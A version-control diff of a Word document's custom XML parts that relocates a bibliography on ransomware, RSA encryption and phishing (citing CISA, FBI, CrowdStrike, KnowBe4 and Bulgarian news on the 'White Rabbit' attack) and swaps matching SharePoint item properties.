-    <b:SourceType>InternetSite</b:SourceType>
-    <b:Guid>{B33FE28A-06AA-43AA-8331-B4CEAD781862}</b:Guid>
-    <b:Title>Social Engineering</b:Title>
-    <b:Author>
-      <b:Author>
-        <b:NameList>
-          <b:Person>
-            <b:Last>University</b:Last>
-            <b:First>Carnegie</b:First>
-            <b:Middle>Mellon</b:Middle>
-          </b:Person>
-        </b:NameList>
-      </b:Author>
-    </b:Author>
-    <b:URL>https://www.cmu.edu/iso/aware/dont-take-the-bait/social-engineering.html</b:URL>
-    <b:RefOrder>13</b:RefOrder>
-  </b:Source>
-  <b:Source>
-    <b:Tag>Bre25</b:Tag>
-    <b:SourceType>InternetSite</b:SourceType>
-    <b:Guid>{3DCF498A-E77B-4961-A5CD-77D2C318EE76}</b:Guid>
-    <b:Author>
-      <b:Author>
-        <b:NameList>
-          <b:Person>
-            <b:Last>Robb</b:Last>
-            <b:First>Brenda</b:First>
-          </b:Person>
-        </b:NameList>
-      </b:Author>
-    </b:Author>
-    <b:Title>AI and Ransomware Prevention: How Smart Tech can Outsmart Cybercriminals</b:Title>
-    <b:ProductionCompany>BlackFog</b:ProductionCompany>
-    <b:Year>2025</b:Year>
-    <b:Month>06</b:Month>
-    <b:Day>24</b:Day>
-    <b:URL>https://www.blackfog.com/ai-and-ransomware-prevention-how-smart-tech-can-outsmart-cybercriminals</b:URL>
-    <b:RefOrder>11</b:RefOrder>
-  </b:Source>
-  <b:Source>
-    <b:Tag>Spr</b:Tag>
-    <b:SourceType>InternetSite</b:SourceType>
-    <b:Guid>{4BD5D5E2-11B2-43B8-8295-F956C5FB1705}</b:Guid>
-    <b:Title>Spring Security Crypto Module</b:Title>
-    <b:ProductionCompany>Spring</b:ProductionCompany>
-    <b:URL>https://docs.spring.io/spring-security/reference/features/integrations/cryptography.html</b:URL>
-    <b:RefOrder>12</b:RefOrder>
-  </b:Source>
-  <b:Source>
-    <b:Tag>Бял</b:Tag>
-    <b:SourceType>InternetSite</b:SourceType>
-    <b:Guid>{86C8A9EE-D72B-49F2-8AA7-3534AB86AA70}</b:Guid>
-    <b:Title>Бял заек Ransomware</b:Title>
-    <b:ProductionCompany>EnigmaSoft</b:ProductionCompany>
-    <b:URL>https://www.enigmasoftware.com/bg/byalzaekransomware-otstranqvane/</b:URL>
-    <b:RefOrder>10</b:RefOrder>
-  </b:Source>
-  <b:Source xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography">
-    <b:Tag>Чов25</b:Tag>
-    <b:SourceType>InternetSite</b:SourceType>
-    <b:Guid>{88E52C84-D818-4670-B18A-420A29F4B14B}</b:Guid>
-    <b:Title>Човешка грешка пуснала "Белия заек" да хакне системата на ВАС</b:Title>
-    <b:ProductionCompany>СЕГА</b:ProductionCompany>
-    <b:Year>2025</b:Year>
-    <b:Month>01</b:Month>
-    <b:Day>30</b:Day>
-    <b:URL>https://www.segabg.com/category-bulgaria/choveshka-greshka-pusnala-beliya-zaek-da-hakne-sistemata-na-vas</b:URL>
-    <b:RefOrder>9</b:RefOrder>
-  </b:Source>
-</b:Sources>
+<?mso-contentType ?>
+<FormTemplates xmlns="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms">
+  <Display>DocumentLibraryForm</Display>
+  <Edit>DocumentLibraryForm</Edit>
+  <New>DocumentLibraryForm</New>
+</FormTemplates>
 </file>
 
 <file path=customXml/item2.xml><?xml version="1.0" encoding="utf-8"?>
@@ -15457,12 +15715,184 @@
 </file>
 
 <file path=customXml/item3.xml><?xml version="1.0" encoding="utf-8"?>
-<?mso-contentType ?>
-<FormTemplates xmlns="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms">
-  <Display>DocumentLibraryForm</Display>
-  <Edit>DocumentLibraryForm</Edit>
-  <New>DocumentLibraryForm</New>
-</FormTemplates>
+<b:Sources xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" SelectedStyle="\IEEE2006OfficeOnline.xsl" StyleName="IEEE" Version="2006">
+  <b:Source>
+    <b:Tag>Sto</b:Tag>
+    <b:SourceType>InternetSite</b:SourceType>
+    <b:Guid>{2B4BF2B4-2B0E-46EC-8A46-8D9494091BBA}</b:Guid>
+    <b:Title>#StopRansomware Guide</b:Title>
+    <b:ProductionCompany>Americas Cyber Defense Agency</b:ProductionCompany>
+    <b:URL>https://www.cisa.gov/stopransomware/ransomware-guide</b:URL>
+    <b:RefOrder>1</b:RefOrder>
+  </b:Source>
+  <b:Source>
+    <b:Tag>Ran</b:Tag>
+    <b:SourceType>InternetSite</b:SourceType>
+    <b:Guid>{472FD183-EF2C-470D-A6D1-9E653F75936C}</b:Guid>
+    <b:Title>Ransomware </b:Title>
+    <b:ProductionCompany>FBI</b:ProductionCompany>
+    <b:URL>https://www.fbi.gov/how-we-can-help-you/scams-and-safety/common-frauds-and-scams/ransomware</b:URL>
+    <b:RefOrder>2</b:RefOrder>
+  </b:Source>
+  <b:Source>
+    <b:Tag>Kur22</b:Tag>
+    <b:SourceType>InternetSite</b:SourceType>
+    <b:Guid>{45B254F4-2ED7-4796-9145-8DA52FF7374D}</b:Guid>
+    <b:Author>
+      <b:Author>
+        <b:NameList>
+          <b:Person>
+            <b:Last>Baker</b:Last>
+            <b:First>Kurt</b:First>
+          </b:Person>
+        </b:NameList>
+      </b:Author>
+    </b:Author>
+    <b:Title>History of Ransomware</b:Title>
+    <b:ProductionCompany>CrowdStrike</b:ProductionCompany>
+    <b:Year>2022</b:Year>
+    <b:Month>10</b:Month>
+    <b:Day>09</b:Day>
+    <b:URL>https://www.crowdstrike.com/en-us/cybersecurity-101/ransomware/history-of-ransomware/</b:URL>
+    <b:RefOrder>3</b:RefOrder>
+  </b:Source>
+  <b:Source>
+    <b:Tag>Фил20</b:Tag>
+    <b:SourceType>InternetSite</b:SourceType>
+    <b:Guid>{D0ACEC89-B82E-4903-BDB0-FD382F8077D3}</b:Guid>
+    <b:Author>
+      <b:Author>
+        <b:NameList>
+          <b:Person>
+            <b:Last>Петров</b:Last>
+            <b:First>Филип</b:First>
+          </b:Person>
+        </b:NameList>
+      </b:Author>
+    </b:Author>
+    <b:Title>RSA</b:Title>
+    <b:Year>2020</b:Year>
+    <b:Month>02</b:Month>
+    <b:Day>16</b:Day>
+    <b:URL>https://www.cphpvb.net/network-security/10840-rsa-with-example/</b:URL>
+    <b:RefOrder>5</b:RefOrder>
+  </b:Source>
+  <b:Source>
+    <b:Tag>Wha25</b:Tag>
+    <b:SourceType>InternetSite</b:SourceType>
+    <b:Guid>{5B16835C-9C43-4285-BAF5-D4B2F3F24F90}</b:Guid>
+    <b:Title>What is RSA Asymmetric Encryption? How Does it Work?</b:Title>
+    <b:ProductionCompany>Secure W2</b:ProductionCompany>
+    <b:Year>2025</b:Year>
+    <b:Month>09</b:Month>
+    <b:Day>15</b:Day>
+    <b:URL>https://www.securew2.com/blog/what-is-rsa-asymmetric-encryption</b:URL>
+    <b:RefOrder>6</b:RefOrder>
+  </b:Source>
+  <b:Source>
+    <b:Tag>arc</b:Tag>
+    <b:SourceType>InternetSite</b:SourceType>
+    <b:Guid>{B1A9D737-2102-49C1-98B1-5A289956686D}</b:Guid>
+    <b:Title>archiveus-trojan</b:Title>
+    <b:ProductionCompany>Knowbe4</b:ProductionCompany>
+    <b:URL>https://www.knowbe4.com/ransomware-knowledgebase/archiveus-trojan</b:URL>
+    <b:RefOrder>4</b:RefOrder>
+  </b:Source>
+  <b:Source>
+    <b:Tag>Spe</b:Tag>
+    <b:SourceType>InternetSite</b:SourceType>
+    <b:Guid>{AC188D98-B7F5-4E78-BC9F-61D0C37525B1}</b:Guid>
+    <b:Title>Spear phishing</b:Title>
+    <b:ProductionCompany>Ibm</b:ProductionCompany>
+    <b:URL>https://www.ibm.com/think/topics/spear-phishing</b:URL>
+    <b:Author>
+      <b:Author>
+        <b:Corporate>Matthew Kosinski</b:Corporate>
+      </b:Author>
+    </b:Author>
+    <b:RefOrder>7</b:RefOrder>
+  </b:Source>
+  <b:Source>
+    <b:Tag>Gpc</b:Tag>
+    <b:SourceType>InternetSite</b:SourceType>
+    <b:Guid>{327CB1AD-525D-4623-BC38-89F7CF280C15}</b:Guid>
+    <b:Title>Gpcode</b:Title>
+    <b:ProductionCompany>Knowbe4</b:ProductionCompany>
+    <b:URL>https://www.knowbe4.com/ransomware-knowledgebase/gpcode</b:URL>
+    <b:RefOrder>8</b:RefOrder>
+  </b:Source>
+  <b:Source>
+    <b:Tag>Car</b:Tag>
+    <b:SourceType>InternetSite</b:SourceType>
+    <b:Guid>{B33FE28A-06AA-43AA-8331-B4CEAD781862}</b:Guid>
+    <b:Title>Social Engineering</b:Title>
+    <b:Author>
+      <b:Author>
+        <b:NameList>
+          <b:Person>
+            <b:Last>University</b:Last>
+            <b:First>Carnegie</b:First>
+            <b:Middle>Mellon</b:Middle>
+          </b:Person>
+        </b:NameList>
+      </b:Author>
+    </b:Author>
+    <b:URL>https://www.cmu.edu/iso/aware/dont-take-the-bait/social-engineering.html</b:URL>
+    <b:RefOrder>13</b:RefOrder>
+  </b:Source>
+  <b:Source>
+    <b:Tag>Bre25</b:Tag>
+    <b:SourceType>InternetSite</b:SourceType>
+    <b:Guid>{3DCF498A-E77B-4961-A5CD-77D2C318EE76}</b:Guid>
+    <b:Author>
+      <b:Author>
+        <b:NameList>
+          <b:Person>
+            <b:Last>Robb</b:Last>
+            <b:First>Brenda</b:First>
+          </b:Person>
+        </b:NameList>
+      </b:Author>
+    </b:Author>
+    <b:Title>AI and Ransomware Prevention: How Smart Tech can Outsmart Cybercriminals</b:Title>
+    <b:ProductionCompany>BlackFog</b:ProductionCompany>
+    <b:Year>2025</b:Year>
+    <b:Month>06</b:Month>
+    <b:Day>24</b:Day>
+    <b:URL>https://www.blackfog.com/ai-and-ransomware-prevention-how-smart-tech-can-outsmart-cybercriminals</b:URL>
+    <b:RefOrder>11</b:RefOrder>
+  </b:Source>
+  <b:Source>
+    <b:Tag>Spr</b:Tag>
+    <b:SourceType>InternetSite</b:SourceType>
+    <b:Guid>{4BD5D5E2-11B2-43B8-8295-F956C5FB1705}</b:Guid>
+    <b:Title>Spring Security Crypto Module</b:Title>
+    <b:ProductionCompany>Spring</b:ProductionCompany>
+    <b:URL>https://docs.spring.io/spring-security/reference/features/integrations/cryptography.html</b:URL>
+    <b:RefOrder>12</b:RefOrder>
+  </b:Source>
+  <b:Source>
+    <b:Tag>Бял</b:Tag>
+    <b:SourceType>InternetSite</b:SourceType>
+    <b:Guid>{86C8A9EE-D72B-49F2-8AA7-3534AB86AA70}</b:Guid>
+    <b:Title>Бял заек Ransomware</b:Title>
+    <b:ProductionCompany>EnigmaSoft</b:ProductionCompany>
+    <b:URL>https://www.enigmasoftware.com/bg/byalzaekransomware-otstranqvane/</b:URL>
+    <b:RefOrder>10</b:RefOrder>
+  </b:Source>
+  <b:Source xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography">
+    <b:Tag>Чов25</b:Tag>
+    <b:SourceType>InternetSite</b:SourceType>
+    <b:Guid>{88E52C84-D818-4670-B18A-420A29F4B14B}</b:Guid>
+    <b:Title>Човешка грешка пуснала "Белия заек" да хакне системата на ВАС</b:Title>
+    <b:ProductionCompany>СЕГА</b:ProductionCompany>
+    <b:Year>2025</b:Year>
+    <b:Month>01</b:Month>
+    <b:Day>30</b:Day>
+    <b:URL>https://www.segabg.com/category-bulgaria/choveshka-greshka-pusnala-beliya-zaek-da-hakne-sistemata-na-vas</b:URL>
+    <b:RefOrder>9</b:RefOrder>
+  </b:Source>
+</b:Sources>
 </file>
 
 <file path=customXml/item4.xml><?xml version="1.0" encoding="utf-8"?>
@@ -15474,9 +15904,9 @@
 </file>
 
 <file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{451CF4A7-B298-49AF-BD69-AB8853A0DC1A}">
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{95434D9A-8BA9-420D-93D1-CF746F074EA1}">
   <ds:schemaRefs>
-    <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
+    <ds:schemaRef ds:uri="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms"/>
   </ds:schemaRefs>
 </ds:datastoreItem>
 </file>
@@ -15501,9 +15931,9 @@
 </file>
 
 <file path=customXml/itemProps3.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{95434D9A-8BA9-420D-93D1-CF746F074EA1}">
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{451CF4A7-B298-49AF-BD69-AB8853A0DC1A}">
   <ds:schemaRefs>
-    <ds:schemaRef ds:uri="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms"/>
+    <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
   </ds:schemaRefs>
 </ds:datastoreItem>
 </file>
